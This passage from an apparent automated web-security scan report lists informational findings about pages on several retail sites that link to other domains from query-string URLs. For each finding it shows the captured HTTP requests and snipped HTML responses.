Date: Mon, 16 May 2011 10:18:25 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.petsmart.com"><img src='https://images.scanalert.com/meter/www.petsmart.com/31.gif' alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...
<!-- Referral & Traffic Tracking -->

<script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<!-- Mediaforge Pixel --->
<iframe width="0" scrolling="no" height="0" frameborder="0" src="https://tags.mediaforge.com/if/50"></iframe>
...[SNIP]...

17.52. http://www.redcrossstore.org/Shopper/Product.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /Shopper/Product.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Shopper/Product.aspx?UniqueItemId=464 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/shopper/prodlist.aspx?LocationId=117
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.1.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:23:43 GMT
Content-Length: 71907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<span style="vertical-align: top; white-space: nowrap;"><a href="http://www.redcross.org" style="font-weight: bold; color: #666666;">Jump to RedCross.org&nbsp;<img alt="" src="/Navigation/RedCrossStore/images/arrow.gif" width="17" height="17" style="vertical-align: middle; border-width: 0px;border-style: solid;" />
...[SNIP]...
<li class="rmItem "><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<li class="rmItem rmLast"><a href="https://www.givelife.org/?utm_source=toolbar&amp;utm_medium=storefront&amp;utm_campaign=giveblood" title="Give Blood" class="rmLink rmRootLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<td align="right"><a href="http://www.orderhouse.com" target="_blank"><img src='/images/logo_PoweredByOH.gif' border="0" alt=""/>
...[SNIP]...
<li class="rmItem rmLast"><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink rmRootLink Menu310Root" style="cursor:pointer"><span class="rmText">
...[SNIP]...

17.53. http://www.redcrossstore.org/dp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /dp.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /dp.aspx?pgid=-1&sto=1 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.3.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:49:45 GMT
Content-Length: 48320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<span style="vertical-align: top; white-space: nowrap;"><a href="http://www.redcross.org" style="font-weight: bold; color: #666666;">Jump to RedCross.org&nbsp;<img alt="" src="/Navigation/RedCrossStore/images/arrow.gif" width="17" height="17" style="vertical-align: middle; border-width: 0px;border-style: solid;" />
...[SNIP]...
<li class="rmItem "><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<li class="rmItem rmLast"><a href="https://www.givelife.org/?utm_source=toolbar&amp;utm_medium=storefront&amp;utm_campaign=giveblood" title="Give Blood" class="rmLink rmRootLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<td align="right"><a href="http://www.orderhouse.com" target="_blank"><img src='/images/logo_PoweredByOH.gif' border="0" alt=""/>
...[SNIP]...
<li class="rmItem rmLast"><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink rmRootLink Menu310Root" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1" type="text/javascript" defer="defer" ></script>
...[SNIP]...

17.54. http://www.redcrossstore.org/shopper/prodlist.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /shopper/prodlist.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /shopper/prodlist.aspx?LocationId=117 HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; AccountType=; Pref=0; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; __utma=64822188.2001743552.1305511150.1305511150.1305511150.1; __utmc=64822188

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:18:48 GMT
Content-Length: 83441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<span style="vertical-align: top; white-space: nowrap;"><a href="http://www.redcross.org" style="font-weight: bold; color: #666666;">Jump to RedCross.org&nbsp;<img alt="" src="/Navigation/RedCrossStore/images/arrow.gif" width="17" height="17" style="vertical-align: middle; border-width: 0px;border-style: solid;" />
...[SNIP]...
<li class="rmItem "><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<li class="rmItem rmLast"><a href="https://www.givelife.org/?utm_source=toolbar&amp;utm_medium=storefront&amp;utm_campaign=giveblood" title="Give Blood" class="rmLink rmRootLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<td align="right"><a href="http://www.orderhouse.com" target="_blank"><img src='/images/logo_PoweredByOH.gif' border="0" alt=""/>
...[SNIP]...
<li class="rmItem rmLast"><a href="http://www.redcross.org/where" title="Find your local Red Cross chapter." class="rmLink rmRootLink Menu310Root" style="cursor:pointer"><span class="rmText">
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1" type="text/javascript" defer="defer" ></script>
...[SNIP]...

17.55. https://www.redcrossstore.org/dp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.redcrossstore.org
Path:   /dp.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /dp.aspx?pgid=-22&ReturnTo=Cart HTTP/1.1
Host: www.redcrossstore.org
Connection: keep-alive
Referer: https://www.redcrossstore.org/Shopper/ContactInfo.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.3.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:29:38 GMT
Content-Length: 38918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<li class="rmItem rmLast"><a href="https://www.givelife.org/?utm_source=toolbar&amp;utm_medium=storefront&amp;utm_campaign=giveblood" title="Give Blood" class="rmLink rmRootLink" style="cursor:pointer"><span class="rmText">
...[SNIP]...

17.56. http://www.restorationhardware.com/content/promo.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restorationhardware.com
Path:   /content/promo.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /content/promo.jsp?id=138040&&link=SFGalleryStore HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=b6e810b3b0486de55c7dc77610c783822efa223a5124b4964dd08831; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.2.10.1305509985; engagement=2; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510793290}; cmRS=&t1=1305510801743&t2=1305510806096&t3=1305511157555&t4=1305510793293&lti=1305511157555&ln=134006&hr=%3Fid%3D138040%26%26link%3DSFGalleryStore&fti=&fn=&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:21 GMT
Connection: close
Set-Cookie: TS1c138a=7b67f70a184190a3c9165eedcfa7ec9d2efa223a5124b4964dd08bf9; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:21 GMT
Content-Length: 18688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
<li class="level-1-static babyandchild"><a href="http://www.rhbabyandchild.com/index.jsp" target="_blank"><span>
...[SNIP]...
<li><a target="_blank" href="http://www.facebook.com/RestorationHardware">Visit Us on Facebook</a></li>
                       <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&amp;layout=button_count&amp;show_faces=false&amp;width=188&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:188px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...

17.57. https://www.restorationhardware.com/my-account/sign-in.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.restorationhardware.com
Path:   /my-account/sign-in.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:09:55 GMT
Connection: keep-alive
Set-Cookie: TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:09:55 GMT
Content-Length: 19152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
           <hea
...[SNIP]...
</li>
                       <iframe src="https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&amp;layout=button_count&amp;show_faces=false&amp;width=188&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:188px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...

17.58. http://www.siteadvisor.com/download/windows.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.siteadvisor.com
Path:   /download/windows.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /download/windows.html?cid=64895 HTTP/1.1
Host: www.siteadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cid=64895; s_cc=true; s_campaign=64895; s_nr=1305509542874-Repeat; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Content-Length: 40225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<li id="about-nav"><a href="http://www.mcafee.com/us/about/index.html" target="_blank">About McAfee</a>
...[SNIP]...
<li id="contact-nav"><a href="http://www.mcafee.com/us/about/contact/index.html" target="_blank">Contact us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
<a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.siteadvisor.com&lang=EN"><img width="65" height="37" border="1" src="//images.scanalert.com/meter/www.mcafee.com/55.gif?lang=EN" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams." oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;" /></a>
...[SNIP]...
<div class="firstcolumn of-two-dwin-banner" style="float:left;">
<a class="universal-dloadbtn-dl-1" href="http://home.mcafee.com/Store/FreeTrial.aspx" onclick="trackCustomLink(this,'Free Trial')" target="_blank"><span style="color:#AA0828;">
...[SNIP]...
<div class="firstcolumn of-two-dwin-banner" style="float:left;">
<a class="universal-dloadbtn-dl-2" href="http://us.mcafee.com/root/offer.asp?id=266730&cid=86873" onclick="trackCustomLink(this,'SiteAdvisor Plus')" target="_blank"><span style="color:#AA0828;">
...[SNIP]...
<div><a class="dwin-dloadbtn-header" href="https://sadownload.mcafee.com/products/SA/Website/saSetup.exe" onClick="trackDownload(this,'https://sadownload.mcafee.com/products/SA/Website/saSetup.exe')"><span>
...[SNIP]...
<div style="padding-top:10px">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<li><a href="http://home.mcafee.com/Root/AboutUs.aspx?id=privacy" target="_blank">Privacy Policy</a>
...[SNIP]...
<li><a href="http://home.mcafee.com" target="_blank">McAfee Home</a>
...[SNIP]...

17.59. http://www.toshibadirect.com/td/b2c/laptops.to

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /td/b2c/laptops.to?page=segHHO HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 293930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=lapto438;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0 style="display:none"></IFRAME>
...[SNIP]...
<br />
To fully experience ToshibaDirect.com we recommend upgrading to the latest version of Internet Explorer. <a href="http://www.microsoft.com/windows/internet-explorer/default.aspx" target="_blank">Upgrade Now &raquo;</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family"> <a href="http://shop.toshiba.com/pub/sf/ResponseForm?_ri_=X0Gzc2X%3DUQpglLjHJlTQW2QyRQ0lQzaKQQGQvQ7RzfVXMtX%3DUQpglLjHJlTQW2QyRQ0lQzaHQQzgQvQ7bv&_ei_=" name="&lid=TopNav_SpecialOffers_SignUpForEmails"><h4>
...[SNIP]...
<li class="menu-item last">
<a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support">Support</a>
...[SNIP]...
<dd class="sub-menu-item laptop-family first"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/home.jsp" name="&lid=TopNav_Support_TechSupportCenter"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family"><a href="http://www.csd.toshiba.com/cgi-bin/tais/support/jsp/outFrm.jsp?ofId=ProdReg" name="&lid=TopNav_Support_RegisterYourLaptop"><h4>
...[SNIP]...
<dd class="sub-menu-item laptop-family last"><a href="https://www.csdsupport.toshiba.com/tais/csd/support/cgi-bin/vp_register.cgi" name="&lid=TopNav_Support_RegisterYourTV"><h4>
...[SNIP]...
</script>

<script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js"></script>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/dei10b_TDLaptops_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<li>Intel&reg; <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom&#153;</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li>Intel&reg; <a target="s15004" href="http://syndication.intel.com/DistributeModule.aspx?id=15004" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=15004', 's15004', 'resizable=1,scrollbars=0,width=470,height=245');win.focus();">Atom&#153;</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:35px; margin: 0 -10px -15px 5px;" allowTransparency="true">
</iframe>
...[SNIP]...
<li>Intel&reg; <a target="_blank" href="http://syndication.intel.com/DistributeModule.aspx?ppc_cid=IIP_02105071701&cc=US&contentType=0" onclick="return intel(this)" class="intel-pentium-locked" title="Click here to learn more about Intel&reg; Pentium&reg; Processors">Pentium&reg;</a>
...[SNIP]...
<td class="lucidaSans font10 boldTxt padBott5">
